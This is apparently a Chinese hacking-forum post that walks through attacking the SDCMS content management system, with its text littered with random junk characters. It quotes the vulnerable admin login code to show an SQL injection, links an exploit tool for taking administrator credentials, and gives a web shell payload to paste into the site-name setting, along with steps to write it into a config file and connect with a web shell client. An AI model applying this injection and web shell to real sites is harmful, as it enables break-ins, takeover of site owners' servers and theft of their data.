作者:T00LS 鬼哥6 B. R6 K, Z1 A8 I0 q
漏洞文件:后台目录/index.asp
/ ]) R! I5 m' e6 y5 k0 E0 _
) _# O5 d+ x( B6 e! _8 G4 X$ iSub Check
+ t& b3 i- Q+ f3 j* X0 J Dim username,password,code,getcode,Rs
8 {) |" l- j' I v+ l0 @ IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub/ J3 J9 R: M& G$ |4 j: J" ]
username=FilterText(Trim(Request.Form("username")),1)
! k' O8 @) W4 n) K3 Y2 W password=FilterText(Trim(Request.Form("password")),1)
( a7 L/ y) b* [* r) I code=Trim(Request.Form("yzm"))
! z7 f+ |2 @6 M* A5 Q2 g. u% d9 v getcode=Session("SDCMSCode")
" I) {7 }# q8 u1 R P% u/ [: g IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died7 u' i* n4 `0 w" s' i! U( \
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied( X7 a; q' g8 A$ l% T( j
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
& f& i$ h/ K- ~! T4 g: s IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
1 J- }" T* ?- r& q* _1 V5 e IF username="" or password="" Then2 H0 y5 p7 j1 t' q' M
Echo "用户名或密码不能为空" ied
. W2 o' g4 `/ E. ^( g8 n+ f Else
- s1 S: M# n4 _ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")' {, Y6 x( l+ F) L4 y; K
IF Rs.Eof Then: F0 q$ h2 U2 c5 H4 ?; ?) t
AddLog username,GetIp,"登录失败",1* a. X) ^2 h N0 N: K$ R! R
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
; G& }5 O, o+ R/ Y Else6 n& ~+ T) `7 I0 z0 g8 \- Q
Add_Cookies "sdcms_id",Rs(0)8 }* [, J* X, n2 Y
Add_Cookies "sdcms_name",username
6 ]) D3 C/ L" E Add_Cookies "sdcms_pwd",Rs(2)
; }( B6 y0 B$ n% T' s& N0 h( h Add_Cookies "sdcms_admin",Rs(3)
$ p; |( g# Z& }( V$ p8 Q Add_Cookies "sdcms_alllever",Rs(4)
& {1 {6 L, D+ x ~. @4 k: K Add_Cookies "sdcms_infolever",Rs(5)
0 O" f, E9 [# j( d) z Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")8 g" H2 Y4 z3 V1 p2 D" _3 A& f
AddLog username,GetIp,"登录成功",1
. l' B* |% ?% _, Y8 `( q# @' O7 o '自动删除30天前的Log记录
4 Z+ e1 u, m: p- Q' ` IF Sdcms_DataType Then
* [& G# s/ K6 i/ U Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")* F1 P! b) L+ E% p6 [; N$ v
Else `. V C! d& G1 H
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"); N6 u2 B* @$ c% z7 F6 r# z/ @) G, H
End IF0 Q8 `: _8 ]3 K0 p0 V/ u; o
Go("sdcms_index.asp")" q5 d! ~: V$ L: v' G) i
End IF
2 `8 g. ?* o/ K+ q; m2 f$ s( I8 N Rs.Close4 u0 C: a" w: n) E4 _, O
Set Rs=Nothing
3 {2 r0 ~' f* k7 s0 j7 V, \) f End IF- X! q2 x# j0 t4 M
End Sub- n" i$ ?6 I+ w! x% h, G; e( X5 @
1 D9 s* D, Z! r( Q/ g
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码7 `* e. Y4 B/ j+ A4 M
$ l+ \. \# O |1 pFunction FilterText(ByVal t0,ByVal t1)
- X9 {0 ^+ V8 O/ j IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function9 V7 r* t% r) d9 y% c
t0=Trim(t0)0 F3 ?0 {9 F: a! L5 T7 d. ?) b
Select Case t1. \- M( R, b4 I) R* Z
Case "1"' E! I) T( v4 g3 d, v
t0=Replace(t0,Chr(32),"")9 \; }) Y& i3 R! P
t0=Replace(t0,Chr(13),"")
! I5 T0 n8 N1 z d. u( A t0=Replace(t0,Chr(10)&Chr(10),"")
( G% S+ a* S% G1 l5 U7 k+ }+ f* Y6 F t0=Replace(t0,Chr(10),"")( `7 T; r- ]2 k! s
Case "2"
7 e W# u9 M$ E3 x! \ t0=Replace(t0,Chr(8),"")'回格
7 C6 v$ M6 A2 Y& h9 k( | t0=Replace(t0,Chr(9),"")'tab(水平制表符)
" @; ]; Q$ P) z" m t0=Replace(t0,Chr(10),"")'换行
1 Y" U6 h" x A; F! t t0=Replace(t0,Chr(11),"")'tab(垂直制表符)9 u5 N3 u" o+ d; J) P8 }# w! ?+ g
t0=Replace(t0,Chr(12),"")'换页& [; x9 @" u1 N) D
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
) |; _7 z4 Y4 B4 M t0=Replace(t0,Chr(22),"")% ? W V2 p7 D3 G( ^: g; a1 e8 i
t0=Replace(t0,Chr(32),"")'空格 SPACE5 l* k2 `1 C3 u$ f
t0=Replace(t0,Chr(33),"")'!
7 h# n: a- C$ e3 F& e t0=Replace(t0,Chr(34),"")'". Z3 k% J G' k5 O3 b. ]
t0=Replace(t0,Chr(35),"")'#
3 E! w. r$ |4 D6 H0 L( {- Z' q t0=Replace(t0,Chr(36),"")'$
7 f# [5 P' m8 _4 m( L t0=Replace(t0,Chr(37),"")'%
$ j- E- m; T8 h; @$ x' i5 Z5 N0 A t0=Replace(t0,Chr(38),"")'&
& b4 M$ |5 b+ R; b( n; F9 X+ X* \ t0=Replace(t0,Chr(39),"")''% C) S. U- p5 d% K5 r# k& p
t0=Replace(t0,Chr(40),"")'(" D" a, `1 L2 Z9 i* j/ M* G/ [, {
t0=Replace(t0,Chr(41),"")')
! M7 y0 p9 T, ]- ~9 f! H+ Z# T8 t t0=Replace(t0,Chr(42),"")'*9 v% O2 c! P' F2 I
t0=Replace(t0,Chr(43),"")'+
7 Q2 {4 U/ H* h& w5 v5 P3 {3 M" d t0=Replace(t0,Chr(44),"")'," R. y/ c5 h8 b6 b; o7 J
t0=Replace(t0,Chr(45),"")'-" Z" B9 @/ f! @
t0=Replace(t0,Chr(46),"")'.' |; {# V7 {9 m
t0=Replace(t0,Chr(47),"")'/- a; V w( v% w& t0 ^
t0=Replace(t0,Chr(58),"")':
9 j2 m Y. R7 {6 U( X/ {. f t0=Replace(t0,Chr(59),"")';) u0 h( J, ~* M
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'> r$ t% I3 X3 M; [
t0=Replace(t0,Chr(63),"")'?
: R- G3 \7 P6 J# l! [6 g. @ t0=Replace(t0,Chr(64),"")'@* A/ n& y) o! U: U. x `
t0=Replace(t0,Chr(91),"")'\
$ W" g5 W" o- u, T, j) Z t0=Replace(t0,Chr(92),"")'\
* O! n' W6 N* T t0=Replace(t0,Chr(93),"")']
( ^, k' h: G6 t2 Q& n t0=Replace(t0,Chr(94),"")'^, c/ a# T- n/ e7 m' J" G
t0=Replace(t0,Chr(95),"")'_* B% |0 z' U' K' C/ T5 y6 l/ ^4 s+ N
t0=Replace(t0,Chr(96),"")'`7 o3 E( h7 X. [& C3 ~' A6 f* j
t0=Replace(t0,Chr(123),"")'{/ i/ Y/ b5 @" X1 _& w1 q4 @ b* v
t0=Replace(t0,Chr(124),"")'|! w, \( {8 t# y3 A- {3 _8 t5 s
t0=Replace(t0,Chr(125),"")'}
* E# d' z0 I+ @" B5 d t0=Replace(t0,Chr(126),"")'~8 \; g3 c' X+ O
Case Else7 \) b6 I: {5 K, n
t0=Replace(t0, "&", "&")
4 u7 M! V5 E t" j t0=Replace(t0, "'", "'")5 A3 u6 X) E/ n7 s6 p
t0=Replace(t0, """", """)
3 |3 ?3 g+ L# Z0 V: o# `; K% ^ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")6 c9 ?: B0 |) t% Y( g" V: t& |
End Select* W0 T" T0 b8 U: H7 s# X l
IF Instr(Lcase(t0),"expression")>0 Then
& X! d6 X8 x$ ?! ^7 @ t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
( I9 M7 s& n6 m$ s j' S: |% j End If9 n7 ~: w, t! a- f
FilterText=t0! ^1 }/ e9 T8 U* g" n+ N
End Function2 Z: m+ Q$ v! y7 {4 |0 E% ]
/ v' b! T: p+ W* T" K, p' Y看到没。直接参数是1 只过滤
5 ~5 w5 n% ?1 Y9 M, M1 q2 D t0=Replace(t0,Chr(32)," ")' J9 A5 }# S( s
t0=Replace(t0,Chr(13),"")4 ^1 N# U( ]9 Q0 `+ t; Q X: B3 S
t0=Replace(t0,Chr(10)&Chr(10),"/ f3 J7 z: ^# v5 e$ ~. H% e
")' Z, k# e( ?8 h' B7 W. n. J9 k9 p" L
t0=Replace(t0,Chr(10),"
6 h+ m, i$ |# [$ ^# w: ]")
2 W0 G9 v) d' p+ z漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!" E7 f( @1 b5 A4 N& T
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
' ~/ r; b+ s( t, d3 ]
% D- m: ~! U$ L3 P7 O0 V测试:8 J' c6 t/ x: Q
' ~+ E" {0 J0 W- e$ \2 y W+ Z9 m$ H
. @: B+ A4 A3 m9 l% u
现在输入工具上验证码,然后点OK+ r' p' C8 n. J/ s @
" i' F- o! G6 \ E' i) L
# M" x4 h9 w8 I: V& f
看到我们直接进入后台管理界面了,呵呵!
. d; C1 g7 y6 U3 }/ k2 r- v2 C) X/ {2 @5 o
- p8 Q# c+ Q- m ?' l8 I* H6 v
' X, l$ s4 U% Y/ ?1 E# u这样直接进入后台了。。。。
# _) i( B/ m: R& ]2 f) t2 ^
/ x1 Q' c. k; r. F7 ^ 0 \) e9 r; l3 Z. o
$ i; k1 ?* a/ QSDCMS提权:/ T' B- e8 L9 `$ R$ q4 D
8 |1 w/ F/ ]1 a. a1 z* V: t
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
$ { ]+ f4 t! x9 A
; G$ G0 Q2 _, P! P/ G- \1 `" e. n7 X! V$ G1 E- D
5 R: c4 b5 v+ ?: \5 n$ pOK,现在用菜刀连接下!) i( p0 u/ w! y1 F1 R/ R
' Q% k$ K& L3 k0 M5 J U1 n
+ L" I7 J. z1 f" |4 F8 v9 T3 X0 b5 M1 C$ [1 I1 J8 L! [ E
8 d, }; v8 n$ j+ N) [
) E! L) v8 Y7 P0 o J |